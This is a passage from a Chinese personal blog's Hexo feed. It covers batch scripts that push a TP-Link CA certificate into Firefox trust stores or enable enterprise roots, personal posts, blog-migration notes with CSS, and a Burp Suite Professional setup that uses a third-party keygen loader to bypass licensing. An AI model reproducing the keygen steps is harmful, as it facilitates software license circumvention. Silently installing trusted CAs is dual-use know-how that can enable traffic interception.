set default_name=!folder!</span><br><span class="line"> set "all_path=%db_path%!default_name!"</span><br><span class="line"> ::显示default文件夹全路径</span><br><span class="line"> echo !all_path!</span><br><span class="line"> ::显示更新前证书库</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!</span><br><span class="line"> ::更新证书库</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!</span><br><span class="line"> ::显示更新后的证书库</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!</span><br><span class="line"> ) else (</span><br><span class="line"> echo no or more</span><br><span class="line"> )</span><br><span class="line">) ELSE (</span><br><span class="line"> echo no</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">goto :eof</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">:function2</span><br><span class="line">echo Program version is greater than or equal to 49. Executing function 2...</span><br><span class="line">rem 执行函数2的代码,在49版本以上的FireFox中启用security.enterprise_roots.enabled</span><br><span class="line"></span><br><span class="line">set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg</span><br><span class="line">set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\"</span><br><span class="line">echo Moving %source_file_cfg% to %dest_dir_cfg%...</span><br><span class="line">if exist "%source_file_cfg%" ( </span><br><span class="line"> if exist "%dest_dir_cfg%" (</span><br><span class="line"> copy "%source_file_cfg%" "%dest_dir_cfg%" </span><br><span class="line"> ) else (</span><br><span class="line"> echo Directory %dest_dir_cfg% does not exist! Cannot move file.</span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Source file %source_file_cfg% does not exist! Cannot move file. </span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\"</span><br><span class="line">echo Moving %source_file_cfg% to %dest_dir_cfg_x86%...</span><br><span class="line">if exist "%source_file_cfg%" ( </span><br><span class="line"> if exist "%dest_dir_cfg_x86%" (</span><br><span class="line"> copy "%source_file_cfg%" "%dest_dir_cfg_x86%" </span><br><span class="line"> ) else (</span><br><span class="line"> echo Directory does not exist! Cannot move file.</span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Source file %source_file_cfg% does not exist! Cannot move file. </span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">set source_file_js=C:\firefoxinstallcert\local-settings.js</span><br><span class="line">set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\"</span><br><span class="line">echo Moving %source_file_js% to %dest_dir_js%...</span><br><span class="line">if exist "%source_file_js%" ( </span><br><span class="line"> if exist "%dest_dir_js%" (</span><br><span class="line"> copy "%source_file_js%" "%dest_dir_js%" </span><br><span class="line"> ) else (</span><br><span class="line"> echo Directory does not exist! Cannot move file.</span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Source file %source_file_js% does not exist! Cannot move file. </span><br><span class="line">)</span><br><span class="line">set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\"</span><br><span class="line">echo Moving %source_file_js% to %dest_dir_js_x86%...</span><br><span class="line">if exist "%source_file_js%" ( </span><br><span class="line"> if exist "%dest_dir_js_x86%" (</span><br><span class="line"> copy "%source_file_js%" "%dest_dir_js_x86%" </span><br><span class="line"> ) else (</span><br><span class="line"> echo Directory does not exist! Cannot move file.</span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Source file %source_file_js% does not exist! Cannot move file. </span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">goto :eof</span><br><span class="line"></span><br><span class="line">pause</span><br></pre></td></tr></table></figure><h3 id="脚本2"><a href="#脚本2" class="headerlink" title="脚本2"></a>脚本2</h3><p>通过user.js启用security.enterprise_roots.enabled。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">::开启变量延迟扩展</span><br><span class="line">setlocal EnableExtensions EnableDelayedExpansion</span><br><span class="line"></span><br><span class="line">echo ###checking new_version###</span><br><span class="line">echo --------------------------</span><br><span class="line">set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"</span><br><span class="line">set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"</span><br><span class="line">set regKey="CurrentVersion"</span><br><span class="line">set regValue=""</span><br><span class="line"></span><br><span class="line">set Value1="checkversion"</span><br><span class="line"></span><br><span class="line">rem 检查新版本注册表是否存在</span><br><span class="line">reg query %regPath1% >nul 2>nul</span><br><span class="line">echo %errorlevel%</span><br><span class="line">echo !errorlevel!</span><br><span class="line">if %errorlevel%==0 (</span><br><span class="line"> echo new_version Registry key %regkey% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%regValue%"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo new_version Registry key %regkey% does not exist.</span><br><span class="line"> echo --------------------------</span><br><span class="line"> ::检查旧版本注册表路径是否存在</span><br><span class="line"> echo ###checking old_version###</span><br><span class="line"> reg query %regPath2% >nul 2>nul</span><br><span class="line"> if !errorlevel!==0 (</span><br><span class="line"> echo old_version Registry key %regkey% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%regValue%"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line"> ) else (</span><br><span class="line"> echo old_version Registry key %regkey% does not exist.</span><br><span class="line"> set Value1=0.0.0</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line"> echo !Value1!</span><br><span class="line"> echo %Value1%</span><br><span class="line"></span><br><span class="line"> set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"</span><br><span class="line"> echo Majorold: %Major%</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">echo !Value1!</span><br><span class="line">echo %Value1%</span><br><span class="line"></span><br><span class="line">set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"</span><br><span class="line">echo Majornew: %Major%</span><br><span class="line"></span><br><span class="line">::显示最终版本,若为0,则表示未安装Firefox</span><br><span class="line">echo --------------------------</span><br><span class="line">set final_version= %Major%</span><br><span class="line">echo final_version %final_version%</span><br><span class="line">echo --------------------------</span><br><span class="line"></span><br><span class="line">rem 检查版本号</span><br><span class="line">if %final_version% EQU 0 (</span><br><span class="line"> echo Program version is 0. Exiting script...</span><br><span class="line"> exit /b 1</span><br><span class="line">) else if %Major% LSS 49 (</span><br><span class="line"> call :function1</span><br><span class="line">) else (</span><br><span class="line"> call :function2</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">rem 退出脚本</span><br><span class="line">exit /b</span><br><span class="line"></span><br><span class="line">::</span><br><span class="line">:function1</span><br><span class="line">echo Program version is less than 49. Executing function 1...</span><br><span class="line">rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。</span><br><span class="line"></span><br><span class="line">::显示db中的现有证书</span><br><span class="line">set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"</span><br><span class="line">set default_name=""</span><br><span class="line">::判断证书数据库路径是否存在</span><br><span class="line">IF EXIST %db_path% (</span><br><span class="line"> echo default_path exists</span><br><span class="line"> rem 在这里添加需要执行的命令</span><br><span class="line"> set "count=0"</span><br><span class="line"> for /d %%i in ("%db_path%\*") do (</span><br><span class="line"> set /a count+=1</span><br><span class="line"> set "folder=%%~nxi"</span><br><span class="line"> )</span><br><span class="line"> ::判断是否只有*.default这一个文件夹</span><br><span class="line"> if !count! equ 1 (</span><br><span class="line"> set default_name=!folder!</span><br><span class="line"> set "all_path=%db_path%!default_name!"</span><br><span class="line"> ::显示default文件夹全路径</span><br><span class="line"> echo !all_path!</span><br><span class="line"> ::显示更新前证书库</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!</span><br><span class="line"> ::更新证书库</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!</span><br><span class="line"> ::显示更新后的证书库</span><br><span class="line"> C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!</span><br><span class="line"> ) else (</span><br><span class="line"> echo no or more</span><br><span class="line"> )</span><br><span class="line">) ELSE (</span><br><span class="line"> echo no</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">goto :eof</span><br><span class="line"></span><br><span class="line">:function2</span><br><span class="line">echo Program version is greater than or equal to 49. Executing function 2...</span><br><span class="line">rem 执行函数2的代码,在49版本以上的FireFox中通过增加user.js配置文件启用security.enterprise_roots.enabled</span><br><span class="line"></span><br><span class="line">::profiles默认配置文件目录</span><br><span class="line">set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles"</span><br><span class="line">::搜索存在default字符串的文件夹,即profiles配置文件夹</span><br><span class="line">set "searchString=default"</span><br><span class="line">set source_user_js=C:\firefoxinstallcert\user.js</span><br><span class="line">::将user.js文件拷贝到配置文件目录</span><br><span class="line"></span><br><span class="line">IF EXIST %parentFolder% (</span><br><span class="line"> for /d %%F in ("%parentFolder%\*") do (</span><br><span class="line"> echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1</span><br><span class="line"> if errorlevel 1 (</span><br><span class="line"> echo default Folder not found.</span><br><span class="line"> ) else (</span><br><span class="line"> echo default Folder found.</span><br><span class="line"> rem 拼接全路径</span><br><span class="line"> set "all_default_path=%parentFolder%\%%~nxF"</span><br><span class="line"> echo !all_default_path!</span><br><span class="line"> copy "%source_user_js%" !all_default_path! </span><br><span class="line"> )</span><br><span class="line"> )</span><br><span class="line">) ELSE (</span><br><span class="line"> echo no</span><br><span class="line">)</span><br><span class="line">goto :eof</span><br><span class="line">pause</span><br></pre></td></tr></table></figure><h2 id="其他参考资料"><a href="#其他参考资料" class="headerlink" title="其他参考资料"></a>其他参考资料</h2><p><a href="http://www.certificate.fyicenter.com/389_Download_Mozilla_certutil_Tool_for_Windows_7.html">http://www.certificate.fyicenter.com/389_Download_Mozilla_certutil_Tool_for_Windows_7.html</a></p><p><a href="https://dev-tech-crypto.mozilla.narkive.com/QtN6vuxG/availability-of-certutil-on-windows">https://dev-tech-crypto.mozilla.narkive.com/QtN6vuxG/availability-of-certutil-on-windows</a></p><p><a href="https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/">https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/</a></p>]]></content>
</entry>
<entry>
<title>SOC和SIEM建设</title>
<link href="/2023/05/20/SOC%E5%92%8CSIEM%E5%BB%BA%E8%AE%BE/"/>
<url>/2023/05/20/SOC%E5%92%8CSIEM%E5%BB%BA%E8%AE%BE/</url>
<content type="html"><![CDATA[<h1 id="SOC和SIEM建设"><a href="#SOC和SIEM建设" class="headerlink" title="SOC和SIEM建设"></a>SOC和SIEM建设</h1><p>待更。</p><p>引用图片方法1</p><img src="/2023/05/20/SOC%E5%92%8CSIEM%E5%BB%BA%E8%AE%BE/1.jpg" class=""><p>引用图片方法2:</p><p><img src="/2023/05/20/SOC%E5%92%8CSIEM%E5%BB%BA%E8%AE%BE/1.jpg" alt="pic"></p><p>设置封面图片的几种方式:</p><ul><li>直接引用同名文件夹</li><li>引用/img下的图片</li><li>加入超链接</li></ul>]]></content>
<categories>
<category> 安全 </category>
</categories>
<tags>
<tag> 安全 </tag>
<tag> SIEM </tag>
<tag> SOC </tag>
</tags>
</entry>
<entry>
<title>2023年展望</title>
<link href="/2023/01/01/2023%E5%B9%B4%E5%B1%95%E6%9C%9B/"/>
<url>/2023/01/01/2023%E5%B9%B4%E5%B1%95%E6%9C%9B/</url>
<content type="html"><![CDATA[<h2 id="2022年总结"><a href="#2022年总结" class="headerlink" title="2022年总结"></a>2022年总结</h2><p>整个2022年过的比较压抑,无休止的封控,每天一次不停的核酸,最多的时候一天三次。直到12月突然放开,侥幸成为部门倒数第二个阳🐏的人,也算跑进了决赛圈。今天身体快恢复了,总体感觉就是中等感冒,并无大碍。</p><p>基地提供了很好的环境,享受了最好的图书馆,静下心来度过了大半年时光。22年的考研以失败告终(准确来讲,是21年考的),该做的准备都做了,奈何实力不够,差十几分未过线。身边很多朋友二战的,我也很遗憾,但不得不向前走了。</p><p>回到学校,大四下,便开始准备面试。最多的时候一天四轮面试,面的麻木了。到三月底,拿了七八个offer,选了个还算可以的就匆匆结束了。</p><p>然后又进入一段极其压抑痛苦的时光,选了一个比较前沿的密码学课题,原理难懂,实验更难,指导老师的压迫感比童年最大的阴影-钢琴老师来的还强。还好有热心学长帮忙指导,最后也顺利毕业了。</p><p>离开学校已有半年时间,没有太多留恋,或许再回去已是很多年之后了吧。</p><p>在家乡,度过了美好的暑期,那是人生少有的一段最轻松的时光。前一次是高考之后,后一次大概是退休吧。</p><p>7月底独自一人南下深圳,正式成为一名打工人。</p><p>打工半年,2022结束。</p><h2 id="2023年展望"><a href="#2023年展望" class="headerlink" title="2023年展望"></a>2023年展望</h2><p>希望在未来这一年,做好职业规划,控制个人习惯,多给家人买些东西。培养一些兴趣爱好(唢呐,钓鱼,围棋等),多运动,多看几本书。</p><p>立几个flag:</p><ul><li><input disabled="" type="checkbox"> 每月至少写一次博客</li><li><input disabled="" type="checkbox"> 上半年考CCNP</li><li><input disabled="" type="checkbox"> 下半年拿下OSCP</li><li><input checked="" disabled="" type="checkbox"> 如果可以,养一只猫🐱</li></ul><p>愿2023年顺利。</p>]]></content>
<categories>
<category> 感悟 </category>
</categories>
</entry>
<entry>
<title>Hello hexo</title>
<link href="/2022/12/31/hello-hexo/"/>
<url>/2022/12/31/hello-hexo/</url>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Clean"><a href="#Clean" class="headerlink" title="Clean"></a>Clean</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo clean</span><br></pre></td></tr></table></figure><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
<categories>
<category> blog </category>
</categories>
<tags>
<tag> blog </tag>
</tags>
</entry>
<entry>
<title>Mac下 安装BurpsuiteProfession</title>
<link href="/2022/12/26/burpsuite/"/>
<url>/2022/12/26/burpsuite/</url>
<content type="html"><![CDATA[<h1 id="Mac下安装BP-Profession"><a href="#Mac下安装BP-Profession" class="headerlink" title="Mac下安装BP Profession"></a>Mac下安装BP Profession</h1><h3 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h3><p>之前用的注册机现在不能使用了,需要换新的。</p><p>原来:<a href="https://github.com/TrojanAZhen/BurpSuitePro-2.1">https://github.com/TrojanAZhen/BurpSuitePro-2.1</a></p><p>现用:<a href="https://github.com/h3110w0r1d-y/BurpLoaderKeygen">https://github.com/h3110w0r1d-y/BurpLoaderKeygen</a></p><h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><p>先到官网下载安装。</p><p><a href="https://portswigger.net/burp/releases">https://portswigger.net/burp/releases</a></p><p>按往常一样,将jar包放到Burpsuite app同级目录下,</p><p><img src="/2022/12/26/burpsuite/test2.png" alt="pic"></p><p>运行:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd /Applications/Burp\ Suite\ Professional.app/Contents/Resources/app && "/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java" "--add-opens=java.desktop/javax.swing=ALL-UNNAMED" "--add-opens=java.base/java.lang=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.tree=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.Opcodes=ALL-UNNAMED" "-javaagent:BurpLoaderKeygen.jar" "-jar" "/Applications/Burp Suite Professional.app/Contents/Resources/app/burpsuite_pro.jar"</span><br></pre></td></tr></table></figure><p>开另一个终端:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/Applications/Burp\ Suite\ Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java -jar /Applications/Burp\ Suite\ Professional.app/Contents/Resources/app/BurpLoaderKeygen.jar</span><br></pre></td></tr></table></figure><p>按往常的注册流程即可。</p><p>为方便运行,</p><p>修改vmoptions.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">-XX:MaxRAMPercentage=50</span><br><span class="line">-include-options user.vmoptions--add-opens=java.desktop/javax.swing=ALL-UNNAMED</span><br><span class="line">--add-opens=java.base/java.lang=ALL-UNNAMED</span><br><span class="line">--add-opens=java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED</span><br><span class="line">--add-opens=java.base/jdk.internal.org.objectweb.asm.tree=ALL-UNNAMED</span><br><span class="line">--add-opens=java.base/jdk.internal.org.objectweb.asm.Opcodes=ALL-UNNAMED</span><br><span class="line">-javaagent:BurpLoaderKeygen.jar</span><br><span class="line">-Xmx2048m</span><br></pre></td></tr></table></figure><img src="/2022/12/26/burpsuite/test1.png" class=""><p>之后就可以正常使用了。</p><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a href="https://www.sqlsec.com/2019/11/macbp.html#BP-2022-1">https://www.sqlsec.com/2019/11/macbp.html#BP-2022-1</a></p>]]></content>
</entry>
<entry>
<title>博客迁移</title>
<link href="/2022/12/04/%E5%8D%9A%E5%AE%A2%E8%BF%81%E7%A7%BB/"/>
<url>/2022/12/04/%E5%8D%9A%E5%AE%A2%E8%BF%81%E7%A7%BB/</url>
<content type="html"><![CDATA[<hr><h3 id="为什么迁移博客"><a href="#为什么迁移博客" class="headerlink" title="为什么迁移博客"></a>为什么迁移博客</h3><p>之前的博客用了快三年,有一些小问题,另外发现有些图片失效了,甚至给我换了广告,不能忍。</p><p>而且速度很慢,准备换个框架,整体迁移一下。</p><p>以前用的是Jekyll,一个小众主题,很简洁,有语言翻译功能,手机端做的也不错。但是可扩展性差,用的人少,功能不完善。</p><h3 id="需求"><a href="#需求" class="headerlink" title="需求"></a>需求</h3><p>当前需求:</p><ul><li><p>支持RSS</p></li><li><p>支持外链,GitHub,知乎等</p></li><li><p>支持查看运行时间,访问总次数。</p></li><li><p>支持归档,时间倒序排列。</p></li><li><p>支持转发到微信,qq,Twitter</p></li><li><p>相关文章推荐</p></li><li><p>写公告</p></li></ul><p>长远需求:</p><ul><li>评论</li><li>弹出聊天框</li><li>插入广告</li><li>支持打赏</li></ul><h3 id="寻找框架主题"><a href="#寻找框架主题" class="headerlink" title="寻找框架主题"></a>寻找框架主题</h3><p>主流静态框架有三种:</p><div class="tabs" id="test1"><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#test1-1">Tab1</button></li><li class="tab"><button type="button" data-href="#test1-2">Tab2</button></li><li class="tab"><button type="button" data-href="#test1-3">Tab3</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="test1-1"><p><strong>Hexo</strong></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="test1-2"><p><strong>Hugo</strong></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="test1-3"><p><strong>Jekyll</strong></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div><p>最终决定用hexo</p><p>框架:<a href="https://github.com/hexojs/hexo">https://github.com/hexojs/hexo</a></p><p>主题:<a href="https://github.com/jerryc127/hexo-theme-butterfly">butterfly</a></p><p>此框架国内用的多,有问题方便查找,主题功能完善,看了别人的demo,特别惊艳。</p><p>可以满足我需要的所有需求。</p><p>缺点是不方便多端编辑,需要在本地生成之后上传所有文件。不像之前的Jekyll,只上传一个md文件就够了。</p><h3 id="迁移进度"><a href="#迁移进度" class="headerlink" title="迁移进度"></a>迁移进度</h3><ul><li><input checked="" disabled="" type="checkbox"> 框架迁移</li><li><input checked="" disabled="" type="checkbox"> post迁移</li><li><input checked="" disabled="" type="checkbox"> 调整格式为hexo格式</li><li><input checked="" disabled="" type="checkbox"> 图片迁移(迁移了部分图片,有些404被SMS和谐了,之后把图片都放在Github上)</li><li><input disabled="" type="checkbox"> 多终端同步(main保存源文件,gh-pages保存生成后的文件。尝试后失败)</li><li><input checked="" disabled="" type="checkbox"> 格式美化</li><li><input disabled="" type="checkbox"> 配置CDN</li></ul><h3 id="渐变背景色"><a href="#渐变背景色" class="headerlink" title="渐变背景色"></a>渐变背景色</h3><p>参考:</p><p><a href="https://www.antmoe.com/posts/7198453">https://www.antmoe.com/posts/7198453</a></p><p><a href="https://www.cnblogs.com/MoYu-zc/p/14397889.html">https://www.cnblogs.com/MoYu-zc/p/14397889.html</a></p><p>遇到了渐变色不生效的问题,看了上面这篇文章,解决了。将<code>butterfly.yml</code>的<code>background</code>改为<code>"#efefef"</code></p><p>下面是配置背景色的css文件。</p> <figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* 文章页背景 */</span></span><br><span class="line"><span class="selector-class">.layout</span> > <span class="selector-tag">div</span><span class="selector-pseudo">:first</span>-child<span class="selector-pseudo">:not</span>(<span class="selector-class">.recent-posts</span>) {</span><br><span class="line"> <span class="comment">/* 以下代表白色透明度为0.5 */</span></span><br><span class="line"> <span class="attribute">background</span>: <span class="built_in">rgba</span>(<span class="number">255</span>, <span class="number">255</span>, <span class="number">255</span>, <span class="number">0.5</span>);</span><br><span class="line">}</span><br><span class="line"><span class="comment">/* 所有背景(包括首页卡片、文章页、页面页等) */</span></span><br><span class="line"><span class="selector-id">#recent-posts</span> > <span class="selector-class">.recent-post-item</span>,</span><br><span class="line"><span class="selector-class">.layout</span> > <span class="selector-tag">div</span><span class="selector-pseudo">:first</span>-child<span class="selector-pseudo">:not</span>(<span class="selector-class">.recent-posts</span>),</span><br><span class="line"><span class="selector-class">.layout_post</span> > <span class="selector-id">#page</span>,</span><br><span class="line"><span class="selector-class">.layout_post</span> > <span class="selector-id">#post</span>,</span><br><span class="line"><span class="selector-class">.read-mode</span> <span class="selector-class">.layout_post</span> > <span class="selector-id">#post</span> {</span><br><span class="line"> <span class="comment">/* 以下代表白色透明度为0.5 */</span></span><br><span class="line"> <span class="attribute">background</span>: <span class="built_in">rgba</span>(<span class="number">255</span>, <span class="number">255</span>, <span class="number">255</span>, <span class="number">0.5</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">/* 背景渐变 */</span></span><br><span class="line"><span class="selector-id">#web_bg</span>{</span><br><span class="line"> <span class="comment">/*紫粉渐变*/</span></span><br><span class="line"> <span class="comment">/*background-image: linear-gradient(120deg, #e0c3fc 0%, #8ec5fc 100%);*/</span></span><br><span class="line"> <span class="comment">/*粉白蓝*/</span></span><br><span class="line"> <span class="comment">/*background-image: linear-gradient(-225deg, #dfbacd 0%, #B8DCFF 48%, #58abf3 100%);*/</span></span><br><span class="line"> <span class="comment">/*background-image: linear-gradient(120deg, #89f7fe 0%, #66a6ff 100%);*/</span></span><br><span class="line"> <span class="comment">/*background-image: linear-gradient(120deg, #a1c4fd 0%, #c2e9fb 100%);*/</span></span><br><span class="line"> <span class="attribute">background-image</span>: <span class="built_in">linear-gradient</span>(to top, <span class="number">#fff1eb</span> <span class="number">0%</span>, <span class="number">#ace0f9</span> <span 